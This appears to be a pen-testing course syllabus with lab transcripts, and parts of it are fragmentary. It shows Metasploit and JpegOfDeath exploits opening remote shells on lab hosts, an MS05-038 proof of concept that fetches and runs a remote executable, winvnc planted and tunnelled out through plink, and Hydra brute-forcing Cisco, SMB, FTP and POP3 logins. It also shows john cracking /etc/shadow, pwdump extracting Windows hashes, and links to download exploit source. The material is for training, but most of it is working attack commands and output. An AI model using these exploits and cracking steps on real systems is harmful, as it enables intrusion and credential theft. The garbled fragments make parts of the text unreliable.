"\xa3\xdb\x83\xcd\xec\xe8\x80\x98\x7a\x73\xaf\x26\xd8\x06\x7b\x11"
"\x7b\x73\xa9\xb1\xf8\x8c\x7f\x4e"; 

Duration: 95 mins

PreRequisites: Instructor Demo

Goals:

Solution: To be demonstrated by Instructor

The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

The Framework was written in the Perl scripting language and includes various components written in C, assembler, and Python. The widespread support for the Perl language allows the Framework to run on almost any Unix-like system under its default configuration. A customized Cygwin environment is provided for users of Windows-based operating systems. The project core is dual-licensed under the GPLv2 and Perl Artistic Licenses, allowing it to be used in both open-source and commercial projects.

This project can be roughly compared to commercial offerings such as Immunity's CANVAS and Core Security Technology's Impact. The major difference between the Framework and these commercial products is the focus; while the commercial products need to always provide the latest exploits and an intuitive GUI, the Framework was designed to facilitate research and experimentation with new technologies.

muts@vaio ~
$ cd framework

muts@vaio ~/framework
$ ./msfcli ms05_039_pnp RHOST=192.168.1.161 PAYLOAD=win32_bind TARGET=0 E
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.1.152:2727 <-> 192.168.1.161:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 


+ -- --=[ msfconsole v2.4 [100 exploits - 75 payloads]

msf > use ms05_039_pnp
msf ms05_039_pnp > set RHOST 192.168.1.161
RHOST -> 192.168.1.161
msf ms05_039_pnp > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf ms05_039_pnp(win32_bind) > set TARGET 0
TARGET -> 0
msf ms05_039_pnp(win32_bind) > show options 

Exploit and Payload Options
===========================

 Exploit:    Name       Default          Description
 --------    -------    -------------    --------------------------------------
 required    RHOST      192.168.1.161    The target address
 required    SMBPIPE    browser          Pipe name: browser, srvsvc, wkssvc
 optional    SMBDOM                      The domain for specified SMB username
 required    RPORT      139              The target port
 optional    SMBUSER                     The SMB username to connect with
 optional    SMBPASS                     The password for specified SMB username

 Payload:    Name        Default    Description
 --------    --------    -------    ------------------------------------------
 required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
 required    LPORT       4444       Listening port for bind shell

 Target: Windows 2000 SP0-SP4

msf ms05_039_pnp(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.1.152:2704 <-> 192.168.1.161:4444 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . : lan
       IP Address. . . . . . . . . . . . : 192.168.1.161
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.1.138

C:\WINNT\system32>

Duration: 20 mins

PreRequisites: Instructor Demo

Goals:

• Excercises

C:\tools>dfind

       ================================================[rev-1.0.5]==
       ==============DFind - #1 Tiny Security Scanner===============
       ============multi-threaded for Linux and Windows=============
       =============================================================
                                 MAIN MENU
       =============================================================

[+] Usage: DFind <Option> <Syntax>
[+] <Option>:
       _______________________________________________________
       |___-p___|___+p___|___-pu__|__-ban__|__-web__|__-dde__|
       _______________________________________________________
       |__-rad__|__-wns__|_-http__|_-sock__|__-ipc__|__-nbn__|

[+] Type DFind <Option> to look the <Syntax>
[+] Number of possibles usages: 683

• Excercises

• Excercises

text

http://www.hackingdefined.com/tools/tools/Tools/Exploits/CMDexe-XP-SP12.rar

src=\\\"http://freehost19.websamba.com/shreddersub7/htm.txt

<param name=item1 value=',cmd.exe,/c pause,'>

C:\>jpg.exe -r 192.168.1.151 -p 53 fun.jpg
+------------------------------------------------+
|  JpegOfDeath - Remote GDI+ JPEG Remote Exploit |
|    Exploit by John Bissell A.K.A. HighT1mes    |
|           TweaKed By M4Z3R For GSO             |
|              September, 23, 2004               |
+------------------------------------------------+
 Exploit JPEG file fun.jpg has been generated!

C:\>nc -lvp 53
listening on [any] 53 ...
connect to [192.168.1.151] from XPSP1 [192.168.1.157] 1063
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\see>

http://www.hackingdefined.com/tools/tools/Tools/Exploits/MS04-028.c

http://www.hackingdefined.com/tools/tools/Tools/Exploits/MS05-038.c

d:\tools>MS05-038.exe http://www.hackingdefined.com/calc.exe

========================================
Ms05-038 exploit POC
Write By Zwell
2005-8-11
http://www.donews.net/zwell
zwell@sohu.com
========================================

[+] download url:http://www.hackingdefined.com/calc.exe
[+] Build shellcode successful
[+] Build file successful
Now, you can open the builded file(zwell_ms05038.html) with IE to see the  result.Good Luck ^_^

d:\tools>

• Excercises

• Excercises

Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to the daemon's code.

http://www.hackingdefined.com/downloads/stunnel.rar

Create a folder called C:\stunnel and place the Stunnel executable, libssl32.dll, libeay32.dll and stunnel.pem files in it.

Create a file called stunnel.conf. Use the following client template as a reference:

client = yes
[pop3s]
accept = 127.0.0.1:1109
connect = pop3s.myisp.com:995 

[imaps]
accept = 127.0.0.1:1439
delay = yes
connect = imaps.myisp.com:993

[smtps]
accept = 127.0.0.1:259
connect = smtps.myisp.com:465

SSH tunnelling is one of the more advanced techniques to infiltrate a firewalled host. This technique goes hand in hand with a client side attack, as we are able to expose ports on an internal victim, to our own (external) attacking machine.

SSH (or Secure SHell) is a protocol for creating a secure connection between two systems. In the SSH protocol, the client machine initiates a connection with a server machine.

The following safeguards are provided by SSH:

• After an initial connection, the client verifies it is connecting to the same server during subsequent sessions.

• The client transmits its authentication information to the server, such as a username and password, in an encrypted format.

• All data sent and received during the connection is transferred using strong, 128 bit encryption, making it extremely difficult to decrypt and read.

• The client has the ability to use X11 applications launched from the shell prompt. This technique, called X11 forwarding, provides a secure means to use graphical applications over a network.

Because the SSH protocol encrypts everything it sends and receives, it can be used to secure otherwise insecure protocols. Using a technique called port forwarding, an SSH server can become a conduit to secure insecure protocols, like POP, increasing overall system and data security.

SSH protocol has the concept of channels within an ssh connection. What it means is that you can have more than one communication channel within one ssh connection. This is called TCP port forwarding in ssh realm.

Duration: 25 mins

PreRequisites: Instructor Demo VNC SSH files (http://www.hackingdefined.com/downloads/vnc-ssh.rar) SSH Server win32 (http://www.hackingdefined.com/downloads/Setup-SSH.rar)

(winvnc password - seesec)

Goals:

In this excercise we will simulate an attack on a firewalled web server. The web server will be vulnorable to a buffer overflow. We will upload and install winvnc on the server, and then tunnel out the VNC port (5900) back to the attacker.

1. Open the IIS - SSL Vmware Snapshot. Implement windows TCP/IP port filtering to allow only port TCP 443 on the victim web server.

Port scan the web server to verify the filtering is working as expected.

regedit /s vnc.reg 
winvnc –install
net start winvnc

plink.exe -l administrator -pw password -C -R 5900:127.0.0.1:5900 <attacker ip>

Related demo : http://www.hackingdefined.com/movies/ssh-dcom/see-sec-ssh-dcom-tunneling.zip

A DoS attack can be perpetrated in a number of ways. There are three basic types of attack:

1. consumption of computational resources, such as bandwidth, disk space, or Central processing unit|CPU time
2. disruption of configuration information, such as routing information
3. disruption of physical network components

A Nuke attack sends a packet, usually ICMP, which is malformed or fragmented in an invalid way, triggering a Computer bug|bug in the operating system and crashing the targeted computer. This is known as the ping of death.

Various DoS-causing Exploits can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

Other kinds of DoS rely primarily on brute force, flooding the target with overwhelming flux of packets, oversaturating its connection bandwidth or depleting target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

e victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, and a T1 owner can easily defeat a dial-up user.

SYN flood sends a flood of SYN|TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for an ACK|TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of Internet Protocol|IP packets with a faked source address, that is set to the address of the intended victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

Attempts to "flood" a network with bogus packets, thereby preventing legitimate network traffic, are the most common form of attack, often conducted by disrupting network connectivity with the use of multiple hosts in a distributed denial-of-service attack or DDoS. Specific means of attack include: a smurf attack, in which excessive ICMP requests are broadcast to an entire network; bogus HTTP requests on the World Wide Web; incorrectly formed packets; and random traffic. The source addresses of this traffic is usually Internet protocol spoofing|spoofed in order to hide the true origin of the attack. Due to this and the many vectors of attack, there are not comprehensive rules that can be implemented on network hosts in order to protect against denial-of-service attacks, and it is a difficult feat to determine the source of the attack and the identity of the attacker. This is especially true with distributed attacks.

Attacks can be directed at any network device, including attacks on routing devices and World Wide Web|Web, electronic mail, or Domain Name System servers.

Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a Local Area Network|LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted.

If the DoS is conducted in a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all Internet Service Provider|ISPs ban the practice.

Duration: 20 mins

PreRequisites: Patience

Goals:

Weak passwords remain at the top of the list in security breaches.

In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message. In most schemes, the theoretical possibility of a brute force attack is recognised, but it is set up in such a way that it would be computationally infeasible to carry out.

Hydra is a parallized login hacker. It supports bruteforce of Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. It includes SSL support and is part of Nessus. If you’ve been considering installing Linux, this would be a good time.

bash-2.05b# ./hydra

Hydra v2.2 (c) 2002 by van Hauser / THC <vh@reptile.rug.ac.be>

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-o FILE] [-t TASKS] [-g TASKS] [-w TIME] [-f] [-e ns] [-s PORT] [-S] server service [OPT]

Options:

   -S        connect via SSL
   -s PORT   if the service is on a different default port, define it here
   -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
   -p PASS  or -P FILE try password PASS, or load several passwords from FILE
   -e ns     additional checks, "n" for null password, "s" try login as pass
   -C FILE   colon seperated "login:pass" format, instead of -L/-P option
   -o FILE   write found login/password pairs to FILE instead of stdout
   -f  exit after the first found login/password pair
   -t TASKS  run TASKS number of connects in parallel (default: 4)
   -g TASKS  start TASKS number per second until -t TASKS are reached
   -w TIME   in seconds, defines the max wait reply time (default: 30)
   server    the target server
   service   the service to crack. Supported protocols: [telnet ftp pop3 imap 
             http https smb cisco cisco-enable ldap nntp vnc rexec socks5 icq
             pcnfs]
   OPT       some service modules need additional input, put it here

Hydra is a tool to guess valid login/password pairs on a target server. You can always find the newest version at http://www.thehackerschoice.com/ Use this tool only for legal purposes! bash-2.05b#

NOTE:I have created a small password file called pass.txt in my Hydra binary directory. Replace this with your favourite password list.

We'll start with an NMAP fingerprinting of the Router:

bash-2.05b# nmap -O 192.168.1.229

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-10-05 14:48 IST
Interesting ports on 192.168.1.229:
(The 1641 ports scanned but not shown below are in state: closed)
Port       State       Service
23/tcp     open        telnet
79/tcp     open        finger
80/tcp     open        http
Device type: router
Running: Cisco IOS 11.X|21.X
OS details: Cisco IOS 11.3 - 12.0(11), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

Nmap run completed -- 1 IP address (1 host up) scanned in 5.141 seconds

bash-2.05b#

We've identified the Telnet service running - Let’s use hydra to bruteforce the telnet password.

Command line: ./hydra -P pass.txt 192.168.1.229 cisco

bash-2.05b# ./hydra -P pass.txt 192.168.1.229 cisco

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)] 
[23][cisco] login:    password: cloud
Hydra finished.

bash-2.05b#

Once we have a Telnet login (vty) we can try and bruteforce the enable password of the router:

bash-2.05b# ./hydra -m cloud -P pass.txt 192.168.1.229  cisco-enable 

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)]
[23][cisco-enable] login:    password: doggy
Hydra finished.

bash-2.05b#

So now, we can telnet to the router, will full access:

bash-2.05b# telnet 192.168 .1.229
Trying 192.168.1.229...
Connected to 192.168.1.229.
Escape character is '^]'.

User Access Verification

Password: (cloud)
Switch>en
Password:  (doggy)
Switch#sh ru
Building configuration...
Current configuration:
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
enable password cloud
!
!
ip subnet-zero
!
! --More-- 

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.141 smb

Reduced number of tasks to 1 (smb does not like parallel connections)

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 1, login tries: 13 (l:1/p:13)]

[139][smb] login: administrator password: lab

All childrens are dead.

bash-2.05b#

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.110 ftp

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 14 (l:1/p:14)]

[21][ftp] login: administrator password: mypassword

Hydra finished.

bash-2.05b#

bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)]

[110][pop3] login: muts password: mypassword

Hydra finished.

bash-2.05b#

bash-2.05b# ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 17 (l:1/p:17)]

[443][www] login: muts password: password

All childrens are dead.

bash-2.05b#

Target selection:

Login/Password setup:

Hydra start and output:

Duration: 15 mins

Prerequisites: Hydra 4.7 Win32 (http://www.hackingdefined.com/downloads/hydra-4.7-win.zip)

Goals:

root@slax:~# cat /etc/shadow
root:$1$WFevt681$X4KBvxd626C3wvzDiBRwy.:13040:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
muts:$1$2tp0OeOC$uGH1J17PQPgP4JT4Wvxvq.:13053:0:99999:7:::

root@slax:/etc/john# cat /etc/shadow > crackme
root@slax:/etc/john# john crackme
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:01 0% (2)  c/s: 3149  trying: nissan
guesses: 0  time: 0:00:00:07 17% (2)  c/s: 3232  trying: DOUG
guesses: 0  time: 0:00:00:08 20% (2)  c/s: 3231  trying: russel!
guesses: 0  time: 0:00:00:10 24% (2)  c/s: 3227  trying: western7
guesses: 1  time: 0:00:00:50 (3)  c/s: 3056  trying: cloud
cloud            (root)
doggy            (muts)
root@slax:/etc/john#

• Bruting Hashes
• Rainbowcrack Technique

C:\tools>pwdump4 \\127.0.0.1

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
  by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.

local path of \\127.0.0.1\ADMIN$ is: D:\WINDOWS
connect to 127.0.0.1 for result, plz wait...
SRV>Version: OS Ver 5.1, Service Pack 2, Workstation
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:FD449136606880E7FF14FEDDDADC3477:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:3062FDC0770C1166E7BA4694CAE62EE7:8D81C2D6AF0C47AA59BEA8CA94953E33:::
muts:1003:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:420DB818E7E2D8482F46E38190F1C500:::
LSA>Samr Enumerate 5 Users In Domain VAIO.
All Completed.

C:\tools>

• Resetting passwords on Linux
• Resetting passwords on Windows (local)
• Resetting passwords on Windows (Domain Controller)
• Resetting passwords on Cisco Devices
• Excercises

text

root@slax:~/aircrack-2.3# ./airodump

 airodump 2.3 - (C) 2004,2005 Christophe Devine

 usage: airodump <interface name or pcap filename>
                 <output prefix> <channel> [IVs flag]

 Specify 0 as the channel number to hop between b/g channels;
 the channel is ignored if the packet source is a pcap file.

 If the optional IVs flag is set to 1, then only the captured
 unique WEP IVs are saved, so as to save space -- the default
 behaviour is to write the whole packets in libpcap format.

 Examples:

   Capture packets on channel 7: airodump ath0 wlan-dump 7
   Extract IVs from a pcap file: airodump out.cap small 0 1

root@slax:~/aircrack-2.3#

text

• SNMP Enumeration and Bruteforce
• SNMP Remote Management
• Telnet Brutefoce
• Cisco Vulnerabilities
• ACL Bypassing
  • Bypassing Cisco ACLs by Spoofing SNMP Requests
• GRE Sniffing
  • Sniffing remote traffic via GRE tunnels
  • GRE Sniffing Movie (http://www.hackingdefined.com/movies/gre-sniff.zip)
• Excercises